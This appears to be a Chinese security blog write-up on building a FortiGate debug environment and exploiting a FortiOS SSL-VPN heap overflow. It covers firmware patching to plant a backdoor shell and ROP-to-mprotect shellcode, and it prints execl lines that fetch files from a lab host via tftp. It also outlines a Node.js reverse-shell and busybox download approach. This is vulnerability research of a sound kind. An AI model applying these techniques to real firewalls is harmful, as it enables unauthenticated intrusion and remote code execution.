历史记录

    清空历史记录
    • 相关的动态
    • 相关的文章
    • 相关的用户
    • 相关的圈子
    • 相关的话题
    注册 登录
    飞塔防火墙漏洞深度利用及调试环境搭建
    sn0w 发表于 广东 IoT安全 2612浏览 · 2025-05-28 02:39

    环境搭建
    通过官方下载附件,导入forigate-vm


    飞塔激活
    可以参考下面师傅给出的脚本进行激活
    rrrrrrri/fgt-gadgets: Fortigate related tools
    网卡ip配置:
    然后设置第一个网卡为Nat模式


    配置网卡
    配置好之后就可以访问了


    配置 sslvpn
    我们需要开启sslvpn的功能,需要对防火墙进行以下配置
    SSLVPN_address subnet_addres ubuntu22


    再创建一个新的用户


    修改 vpn 门户,并进入 full-access 修改界面 VPN —–> SSL-VPN-Portals—-> full-access


    进入vpn中修改设置如下:


    接着修改防火墙配置策略


    然后就可以访问4433端口


    调试环境搭建 gdbserver+gdb
    提取固件
    1、安装libguestfs libguestfs 是一组 Linux 下的 C 语言的 API ,用来访问虚拟机的磁盘映像文件,几乎可访问任意类型的文件系统。
    2、查看磁盘分区情况


    3、挂载
    这里踩雷了 不建议用这种方式挂载 建议在vmware上进行挂载 用上面这种方式可能导致你覆盖文件的时候覆盖的是缓存


    4、挂载成功后,rootfs.gz为文件系统压缩包,我们将其复制出来


    复制出来后赋权解压


    gdb
    准备一个busybox 提供完成的sh指令,fgt自带的sh缺少很多指令
    这里容易编译失败 建议多换几个版本试试
    配置busybox
    开始编译遇到的报错是这样


    查了下是tc这部分的问题 但奇怪的是我有导入头文件 于是我就把这部分用make menuconfig中去掉了 Networking Utilities 中tc 然后在编译
    配置gdbserver
    在命令行中执行 diagnose hardware smartctl 系统会执行 /bin/smartctl 程序; 可以自己重新写个smartctl放进去、复用22端口为sh
    gcc编译后 放入bin中
    反编译内核文件flatkc
    在代码中我们可以看到启动的是init文件 因此我们可以patch init文件
    我们把/bin/init的文件这部分patch 只要涉及到do_halt函数 call的全部patch掉
    所有这些做完后 就可以重打包了
    然后提权 把roofts.gz覆盖原来的就可以了
    接下来 我们把flatkc 提取出来 这是内核文件 我们把内核转化为二进制文件 进行分析 和 调试
    踩的坑 我开始安装的时候 出现了这个报错



    我的解决办法是 手动安装
    你可以手动克隆 python-lzo 库到本地,然后再进行安装:
    然后在执行后面的就没问题了


    然后就可以启动飞塔进行调试了 启动后 飞塔如果一直在重启状态就说明我们覆盖成功了 这是因为飞塔一直过不了身份验证
    也就是这个位置


    我们就直接断点到这个位置:




    发现断的不是我们的断点 这里的原因暂不清楚 但是解决办法就是,无论如何别按那个绿色箭头,你只需要理解 你一直c 它是会一直重启的 它重启就会反复执行start_kernel这个流程,那么 你可以尝试先往最开始的点 断 然后一点一点的接近你要断的点


    先断在这里 再断在我们开始要断的位置就可以了


    过了这里 ni 然后 set $rax=0 再c就可以进去了


    然后测试一下后门


    成功拿到shell
    漏洞深度利用
    A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.
    在 FortiOS SSL-VPN 7.2.0 至 7.2.2、7.0.0 至 7.0.8、6.4.0 至 6.4.10、6.2.0 至 6.2.11、6.0.15 及更早版本,以及 FortiProxy SSL-VPN 7.2.0 至 7.2.1、7.0.7 及更早版本中,存在一个基于堆的缓冲区溢出漏洞 [CWE-122]。该漏洞可能允许远程未经身份验证的攻击者通过特制的请求执行任意代码或命令。
    带sh环境下的攻击
    real环境下的攻击


    这里就不得不提一嘴 system和exec系列函数命令执行的区别了:
    1、system()和exec()都可以执行进程外的命令,system是在原进程上开辟了一个新的进程,但是exec是用新进程(命令)覆盖了原有的进程。 2、system()和exec()都有能产生返回值,system的返回值并不影响原有进程,但是exec的返回值影响了原进程。 3、system需要先启动一个shell才能运行指定的命令,调用system函数执行指定命令时,原进程会暂停等待,之后再继续进行;调用exec函数开启新进程后,原进程将被直接关闭。
    那这里没有/bin/sh 那我们命令执行可以攻击的思路是什么呢? 我们为什么要这么做呢?
    1.我们可以通过命令执行下载编译好的busybox 来达到被阉割的shell现状
    2.我们可以直接通过rop上传我们要执行的文件
    这里更多的是推荐思路1, 因为文件上传如果文件过大的话 容易导致连接崩溃
    这里就得考虑构造rop,因为exec有两种类型,一个是数组传参,另一个是参数传参,但是从上面的攻击过程也就是system的攻击过程,其实我们是可以发现 gadget是有点不够的,越打的后面越没有好用的gadget ,因为你不能破坏前面布置好的参数,并且我们可以写入的rop链也是有长度限制的,还有一个比较要命的问题,你要下载busybox 到本地 那就得传送ip 而这个字符串是肯定超过了8字节的,这就会导致我们构造参数时会多出不可控的字符串。导致如果考虑 char 列表来调用的话 rop chain 会修改的非常麻烦!!!(这就是数组传参的弊端)
    那以上两个思路基本都走死走不通的话,我们就不考虑走rop了,用ctf的思路把rop传化为shellcode就可以实现任意gadget了,但是没有
    可执行权限 开了nx保护 这里就想到用mprotect 开一段可执行权限的段,然后前面打system的时候 可以看到 寄存器上是有残余段的地址的,我们只需要通过rop去执行mprotect 然后就可以快乐的写shellcode去命令执行了


    攻击构造过程
    mprotect所需要的参数(addr,len,prot) 也就是我们要劫持rdi rsi rdx这三个参数 并且调用call mprotect


    gdb-peda$ 0x7ff1e109cd78 0x7ff1e0f42000 0x7ff1e11c2000 0x280000 0x0 rw-p

    我们写的位置属于这个段
    0x7ff1e0f42000- 0x7ff1e109cd78 =FFFF FFFF FFEA 5288
    这里是残存的参数rdx

    利用gadget如下




    然后我们只需要利用jmp rsp跳转就可以执行shellcode了 这里为了方便我们可以直接接着jmp rsp后面写shellcode

    shellcode思路
    由于我们这里写入的字节有限大概0xc0长度的样子,如果要写比较麻烦的命令执行 可能不够,这里我的思路是去迁移rip到0x620+8的这个位置 也就是lea rax, [rip + 0x69] 然后就有了基本没有长度限制的shellcode的机会,还有种思路就是构造一个read 但是我这里syscall下去 gdb并没有卡住等待读取,目前不知道什么原因,所以就走思路一了




    接下来就可以快乐的写shellcode了 我们需要干的就是:
    execl执行:/bin/tftp 192.168.111.160 1.js get octet ./1.js
    实际


    execl("/bin/tftp", "/bin/tftp", "192.168.111.148", "1.js", "get", "octet", NULL);
    execl("/bin/tftp","/bin/tftp","192.168.111.148","1.js","get",octet","NULL")


    这里也就是一个个传参,唯一注意的就是 超过八字节的要分两次切割传
    最后参数情况


    检验:


    成功实现攻击 这里监测一下busybox能否上传并正常使用
    直接get busybox不指定路径 成功


    企图直接把busybox放到/cin/busybox中 结果测试失败
    这上面直接传到指定路径的问题是第七个参数的传递 如果直接push 会覆盖我们写的shellcode导致程序崩溃 暂时未想到好的解决办法
    这里执行有两个问题 一没权限 二没指定lib库


    这个问题得思考一下怎么解决 在真实环境中直接get一个busybox 好像不够用 因为没有可执行的权限只有读写权限 这里想了很久没想到有什么办法,也用了几个exp尝试赋权 发现要么太麻烦 要么都失败了,最后在ioo0s师傅文章中,学到了思路
    Nodejs shellcode
    这位师傅用的是Nodejs shellcode,利用飞塔居然内置的nodejs通过测试发现 nodejs xx.js 是可执行的,并且 nodejs 也存在修改文件权限的函数 这里我们先确定一下nodejs确实存在
    通过执行命令或者直接查找发现是没有的 但是通过node*查找


    传一个js文件测试一下


    是可以执行的,因此我们思路就十分清晰了
    这里搬运一下这位ioo0s师傅的思路
    1通过之前的命令执行下载 shell.js
    2shell.js 中至少要包含以下功能
    3一:下载 busybox (比之前的操作简单多了!)
    4二:给 busybox 执行权限
    5三:弄一个 busybox 的 shell 软链
    6四:调用 busybox 中内置的命令 起 shell
    还有一种思路就是通过nodejs 去渲染反弹shell的指令 虽然飞塔的shell被阉割的很严重 但是可以用wget 然后 去wget 服务器上的busybox
    这里一个一个思路讲吧先复现一下ioo0s师傅的思路
    放入js文件用nodejs渲染拉去busybox并且赋权 开ssh环境
    js的文件内容
    busybox可以用自己编译的也可以去wget一个
    编译好的busybox地址各个架构都有
    Index of /downloads/binaries/1.21.1
    上传busy.js文件 POC
    命令执行 /bin/node busy.js
    这里我用的是execve去执行
    可以先写个demo测试,这里要注意的是写shellcode的时候 argv 和 envp分别指的是数组,也就是要把rsi rdx指向构造好的地址


    rsi指向的是0x7ff1eaec7d80对应下面
    类似这种,然后我们这里打exp去执行之前的busy.js指令 在飞塔或者原界面都是没有输出的


    可以看到没有任何回显 但就是执行成功了 成功放入busybox,这里没有放入bin的原因是因为没有权限所以放入tmp文件夹中
    命令执行exp
    接下来有了busybox之后 我们就可以回到带sh环境下去进行攻击了 只是把/bin/busybox改为/tmp/busybox


    nodejs渲染进行反弹shell(通过前面的方式去得到busybox)
    js文件


    nodejs渲染通过js来模拟wget请求下载busybox并且赋权
    js文件




    1 人收藏 0 人喜欢 转载 分享
    0 条评论
    某人
    表情
    可输入 255
      发布投稿
    热门文章
    优秀作者
    目录
    先知社区
    本站/app由 Djingoii 提供技术和产品支持